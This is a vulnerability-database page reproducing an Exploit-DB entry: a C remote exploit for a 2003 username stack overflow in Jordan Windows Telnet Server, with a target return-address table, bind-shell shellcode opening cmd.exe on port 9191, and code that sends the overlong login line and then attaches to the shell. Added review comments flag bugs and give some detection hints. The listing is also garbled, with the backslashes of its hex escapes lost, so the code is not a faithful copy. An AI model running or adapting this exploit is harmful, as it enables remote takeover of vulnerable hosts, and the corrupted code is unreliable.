Jordan Windows Telnet Server 1.0/1.2 – ‘Username’ Stack Buffer Overrun (2)

Jordan Windows Telnet Server 1.0/1.2 – ‘Username’ Stack Buffer Overrun (2)

漏洞ID 1054339 漏洞类型
发布时间 2003-12-29 更新时间 2003-12-29
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23492
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9316/info
 
Jordan Windows Telnet Server has been reported to be prone to a remote buffer overrun vulnerability. The issue is reported to occur when a username of excessive length is supplied to the Telnet server. Because of missing bounds checking, when this username is copied into an undersized buffer on the stack, the data that exceeds the buffer's size overruns its bounds and corrupts adjacent memory. An attacker may exploit this condition to corrupt the saved instruction pointer of the vulnerable function.

/*
 *   Jordan's Windows Telnet server v.1.0 remote exploit
 *  binds cmd.exe shell on port 9191
 *
 * Home page: http://www.jordan.com/WindowsTelnetServer
 * Advisory: http://security.nnov.ru/search/document.asp?docid=5583
 *
 * Tested on winxp only, but must work on other win32 systems.
 *
 * -d4rkgr3y [[email protected]], m00.void.ru
 *
*/

#include <string.h>
#include <unistd.h>
#include <netdb.h>

/*
 * Per-target table. main() copies 4 bytes of ret into the login line at
 * offset 512, and usage() prints the platform names. The last entry is
 * labelled by its author as a denial-of-service choice. Note that there
 * is no NULL-terminating entry, although usage() loops as if there were.
 */
struct
{
	char *platform;
	long ret;
}

targets[]=
{
	{"Windows XP sp0", 0x77F5801C}, // ntdll.dll : jmp esp
	{"Windows XP sp1", 0x77fb59cc},
	{"Windows 2000 SP1" , 0x77e3cb4c } ,
	{"Windows 2000 SP2" , 0x77e2492b } ,
	{"Windows 2000 SP3" , 0x77e2afc5 } ,
	{"Windows 2000 SP4" , 0x77e14c29 } ,
	{"Windows NT sp6", 0x77f0eac3},
	{"Windows 98 SE", 0x7fdabfa9},
	{"Denial-of-Service attack", 0xdefaced},
};

/*
 * Filler that main() copies into the login line at offset 516, directly
 * ahead of w32pbshellcode at offset 548.
 * NOTE(review): as rendered on this page the hex escapes have lost their
 * backslashes, so each "x90" is three ASCII characters rather than one
 * byte; the listing is not a faithful copy of the cited source and does
 * not compile to the bytes the author intended.
 */
char payload[] =
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90"
	"x90x90x90x90";

/*
 * Payload that main() copies into the login line at offset 548. The file
 * header states it binds a cmd.exe shell on TCP 9191, which main() then
 * connects to. From a defender's side, that new listener on 9191 (and the
 * oversized login line that precedes it) is the observable artifact.
 * NOTE(review): the hex escapes are rendered without backslashes on this
 * page, so the literal below is ASCII text as shown.
 */
char w32pbshellcode[] =
	"xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33"
	"xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C"
	"x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE"
	"x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB"
	"xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77"
	"xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77"
	"xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77"
	"xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77"
	"xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77"
	"xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77"
	"xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77"
	"xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77"
	"xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77"
	"xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB"
	"x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C"
	"xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0"
	"x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77"
	"xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0"
	"xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB"
	"x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5"
	"x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98"
	"xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE"
	"x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77"
	"xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8"
	"x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF"
	"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90"
	"x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74"
	"xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4"
	"xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94"
	"x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5"
	"xD3x4Ax8Cx88";

// Declared here with an empty parameter list; the definition further down
// takes the program name (char *) and main() passes argv[0].
void usage();

// Resolved target host: written once by gethostbyname() in main() and read
// by connect_to_host().
struct hostent *hp;

/*
 * Entry point: assembles the oversized login line, delivers it, and then
 * tries to reach the listener the payload is said to open.
 *
 *   argv[1]  host name, resolved with gethostbyname() into the global hp
 *   argv[2]  index into targets[] (only values <= 5 pass the check below)
 *   argv[3]  optional server port; default 23
 *
 * Observable behaviour, for detection purposes: one 1032-byte login line
 * ending in CR LF is sent on the telnet connection, followed by a second
 * connection from the same client to TCP 9191 on the target (the port
 * the file header says the payload listens on). Terminates via exit().
 *
 * NOTE(review): as rendered on this page the escape sequences have lost
 * their backslashes ('x41', 'x0d', "...n"), so this listing does not
 * compile as shown and is not a faithful copy of the cited source.
 */
int main(int argc, char *argv[])
	{
	unsigned short port=23;
	// sock and hand are unsigned but are compared against -1 below; the
	// comparison still works through the usual arithmetic conversions.
	// addr is never used.
	unsigned int sock,addr,hand;
	char buf[1032], shit[666];

	printf("n    Jordan's Windows Telnet server v.1.0 remote exploitn");
	printf("ttby m00 Security // m00.void.runn");

	if(argc<3 || argc>4) usage(argv[0]);
	// targets[] has nine entries but only indexes 0..5 get past this check;
	// atoi() yields 0 on non-numeric input and negative values are not
	// rejected, so the later targets[atoi(argv[2])] is not fully bounded.
	if((atoi(argv[2]))>5) usage(argv[0]);
	// argv[argc] is a null pointer, so this read is safe when argc == 3.
	if(argv[3]) port = atoi(argv[3]);

	// Fill the whole line, then overlay the per-target value at offset 512,
	// the filler at 516 and the payload at 548, and finish with CR LF.
	memset(buf,'x41',1032);
	// ret is a long; only its first 4 bytes in memory are copied, which on
	// a little-endian host are the low-order bytes.
	memcpy(&buf[512], (unsigned char *) &targets[atoi(argv[2])].ret, 4);
	memcpy(&buf[516], payload, sizeof(payload));
	memcpy(&buf[548], w32pbshellcode, sizeof(w32pbshellcode));
	// Line terminator placed right after the payload; strlen() stops at the
	// first NUL byte, so it counts the literal as rendered on this page.
	memset(buf+strlen(w32pbshellcode)+548,'x0d',1);
	memset(buf+strlen(w32pbshellcode)+548+1,'x0a',1);

	printf("~ Resolving hostname => ");
	if((hp=gethostbyname(argv[1]))==NULL) {
		printf("failedn");
		exit(1);
	}
	printf("donen");

	printf("~ Conneting => ");
	if((sock=connect_to_host(port))==-1) {
		printf("failedn");
		exit(1);
	}
	printf("donen");

	printf("~ Sending exploit buffer => ");
	sleep(2);
	// Whatever the server sends first is read into shit and discarded; the
	// return values of both recv() and send() are unchecked, so a short or
	// failed send() would go unnoticed.
	recv(sock,shit,666,0);
	send(sock,buf,1032,0);
	printf("donen");
	printf("~ Connecting to bindshell => ");
	// 1 ms pause before the second connection; connect_to_host() reuses hp.
	usleep(1000);
	if((hand=connect_to_host(9191))==-1)
		printf("failednn");
	else {
		printf("donen~ Shell spawned on port 9191 ^ have a nice daynn");
		get_shell(hand);
	}

	// Only the telnet socket is closed here; get_shell() closes hand itself.
	close(sock);
	exit(0);
}

/*
 * Prints the command-line help and the numbered target names, then exits
 * with status 0.
 *
 * progname: argv[0], echoed into the usage line.
 *
 * The loop ends at the first entry whose platform pointer is NULL, but
 * targets[] as defined above has no such terminating entry, so the loop
 * reads past the end of the array (undefined behaviour) before it stops.
 */
void usage(char *progname)
{
	int i;
	printf("Usage: %s <host> <os type> [port]nnWhere 'os type' is:n",progname);
	for(i=0;targets[i].platform;i++) {
		printf("  %i %sn", i, targets[i].platform);
	}
	printf("n");
	exit(0);
}

/*
 * Opens a TCP connection on the given port to the host that main()
 * resolved into the global hp.
 *
 * Returns the connected socket descriptor, or -1 if socket() or connect()
 * fails; on connect() failure the socket is closed first.
 *
 * hp is dereferenced without a NULL check, and h_addr_list[0] is read
 * through an unsigned long pointer: where unsigned long is wider than the
 * h_length bytes of the address this reads past it (and it is a strict-
 * aliasing violation regardless); the value is then truncated to s_addr.
 */
int connect_to_host(int port)
{
	int sockt;
	struct sockaddr_in saddr;

	if((sockt=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
		return -1;
	memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
	saddr.sin_family=AF_INET;
	saddr.sin_addr.s_addr=*((unsigned long *)hp->h_addr_list[0]);
	saddr.sin_port=htons(port);
	if(connect(sockt, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
		close(sockt);
		return -1;
	} else
	return sockt;
}

/*
 * Relays data between standard input and the connected socket bsh until
 * one side returns 0 bytes, then closes bsh. Always returns 1.
 *
 * bsh: a connected socket descriptor (main() passes the result of
 *      connect_to_host()).
 *
 * Review notes on the body as written:
 *  - buf is 0x31337 (201527) bytes of automatic storage, of which at most
 *    8095 bytes are filled per read.
 *  - recv()/read() return -1 on error, which is then used as an index
 *    (buf[-1] = ...), an out-of-bounds write. r is assigned only on the
 *    branch that runs, so the loop condition may test a stale value.
 *  - The terminator written is '' as rendered, an empty character
 *    constant; the escape's backslash appears lost in extraction.
 *  - printf("%s") and strlen() stop at the first NUL in the data.
 *  - select() is called with a NULL timeout and so blocks; on error it
 *    returns -1, which is non-zero and keeps the loop going.
 */
int get_shell(int bsh)
{
	fd_set rfds;
	int retVal,r;
	char buf[0x31337];
	do {
		FD_ZERO(&rfds);
		FD_SET(0, &rfds);
		FD_SET(bsh, &rfds);
		retVal=select(bsh+1, &rfds, NULL, NULL, NULL);
		if(retVal) {
			if(FD_ISSET(bsh, &rfds)) {

				// Socket -> stdout; no check that recv() succeeded.
				buf[(r=recv(bsh, buf, 8095,0))]='';
				printf("%s", buf);
			}
			if(FD_ISSET(0, &rfds)) {
				// stdin -> socket; no check that read() succeeded.
				buf[(r=read(0, buf, 8095))]='';
				send(bsh, buf, strlen(buf), 0);
			}
		}
	} while(retVal && r);

	close(bsh);
	return 1;
}
